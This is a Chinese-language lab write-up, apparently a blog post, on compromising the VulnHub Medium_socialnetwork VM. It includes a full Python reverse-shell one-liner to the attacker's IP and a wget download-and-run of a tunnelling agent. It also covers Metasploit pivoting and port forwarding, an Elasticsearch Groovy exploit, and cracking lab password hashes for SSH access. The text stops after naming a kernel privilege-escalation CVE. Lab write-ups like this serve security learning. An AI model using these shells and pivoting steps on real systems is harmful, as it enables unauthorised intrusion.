Medium_socialnetwork 打靶记录
靶场下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova
攻击机:192.168.56.102(vmware os:windows 11)
靶机:192.168.56.101(virtualbox)
一、靶机探测
zenmap扫同网段,发现主机192.168.56.101
访问探测到的5000端口,发现一个类似留言板功能;简单fuzz过后,暂时判断该Web界面下不存在利用点。
尝试报错,根据回显判断是python搭建的flask框架
Not Found
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
手动试了几个常见的后台路由,发现"/admin"可访问,且可执行代码。
python 反弹shell(来自棱角社区反弹shell生成器 (ywhack.com)):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
成功反弹shell,且ls探测发现Dockerfile文件。
确认当前靶机为生成的docker环境,权限为root:
ls -alh /.dockerenv
获取常见信息过程中,发现该肉鸡的地址是B类地址,猜测该靶机存在linux内网环境。
本来想nc传到msf上进行后渗透过程,但是靶场好像有问题(也可能是太菜了),传过来会断开连接
ICMP探测一下(潦草的内网探测),发现三台存活主机
for i in `seq 1 254`
do
arping 172.17.0.$i -c 1 >> 1.txt
done
172.17.0.1 | 172.17.0.2 | 172.17.0.3
重试MSF上线,更换使用LUA反向连接,开启监听后通过靶机进行NC连接,成功上线MSF。
use payload/cmd/unix/reverse_lua
set LHOST 192.168.56.102
set LPORT 6666
exploit
此时拿到的SHELL是command_shell,提升meterpreter_shell,拿到新的meterpreter_sessions。
sessions -u 2
加一条指向路由进行数据转发,误操作执行了quit,sessions被关闭了。
sessions 3
run autoroute -s 172.17.0.0/24 //加指向路由
run autoroute -p //查看当前添加的路由
(重新接管meterpreter_sessions,复活吧我的爱人!)
利用新指的路由进行内网探测。
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.1-172.17.0.254
set ports 1-10000
run
探测结果,其中9200和9300是ElasticSearch服务的开放端口。
[+] 172.17.0.1: - 172.17.0.1:22 - TCP OPEN
[+] 172.17.0.1: - 172.17.0.1:5000 - TCP OPEN
[+] 172.17.0.2: - 172.17.0.2:5000 - TCP OPEN
[+] 172.17.0.3: - 172.17.0.3:9200 - TCP OPEN
[+] 172.17.0.3: - 172.17.0.3:9300 - TCP OPEN
为了方便后续渗透,建立一条SOCKS_5的代理,检索代理相关的payload:
search socks_proxy
use auxiliary/server/socks_proxy
生成socks_5隧道。
成功打通隧道,不过不稳定,原因未知。
寻找解决方式,半天,无果,遂倒换venom设置代理:在本地开启venom S端服务:
admin.exe -lport 9999
本地开启python web服务,将C端文件上传至靶机。
攻击机:
python -m http.server 7777
靶机:
wget http://192.168.56.102:7777/agent_linux_x64
C端上线,接收到会话:
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999
开启socks5代理:
show
goto 1
socks 1080
验证代理:浏览器设置代理,成功访问172.17段路由地址。
172.17.0.1多开放一个22端口,可能需要forceburp,先搁置;探测172.17.0.3的Esbsearch服务漏洞:
searchsploit -p 9200
searchsploit -p 9300
未授权访问(高危,但没用)
(这里尝试利用ElasticSearch的过程极其不顺,后续跟着SF的WP学到一个新姿势:把漏洞端口转发到本地,然后铁锅炖自己)
将172.17.0.3的9200端口转发到本地9200端口,将渗透环境拉取到本地
run autoroute -s 172.17.0.0/16
portfwd add -l 9200 -p 9200 -r 172.17.0.3
直接利用MSF搜索Elasticsearch的利用exp,尝试利用exp 1、3进行攻击,都无果;后学习漏洞,得知groove沙盒溢出漏洞利用需要先添加一条数据。
命途多舛,环境的BURP又因为不明原因崩了,换用YAKIT进行应用抓包,成功添加一条数据(需要注意,抓包不能使用本地地址127.0.0.1抓包,否则获取不到流量)
POST /doc/test HTTP/1.1
Host: 192.168.56.102:9200
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Content-Length: 19
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
{ "name" : "lupin"}
重新尝试利用groove沙盒逃逸漏洞
use multi/elasticsearch/search_groovy_script
set RHOSTS 192.168.56.102
set RPORT 9200
set LHOST 192.168.56.102
set LPORT 9200
run
激动的心,颤抖的手,成功得到172.17.0.3的root权限
那么就差本机的渗透了。拿到172.17.0.3权限后,在本地发现passwd文件,查看发现和ssh的连接密钥很像
meterpreter > cat passwords
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
尝试解密md5:hashcat跑了一会没跑出来,放弃选用网络资源查找(MD5免费在线解密破解_MD5在线加密-SOMD5),都能查找到
使用john的账号尝试SSH连接,OJBK
然后,就是尝试提权。靶机的版本内核很老,进行提权利用,选用CVE-2015-1328进行提权;
john@socnet:~$ uname -r
3.13.0-24-generic
1391
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
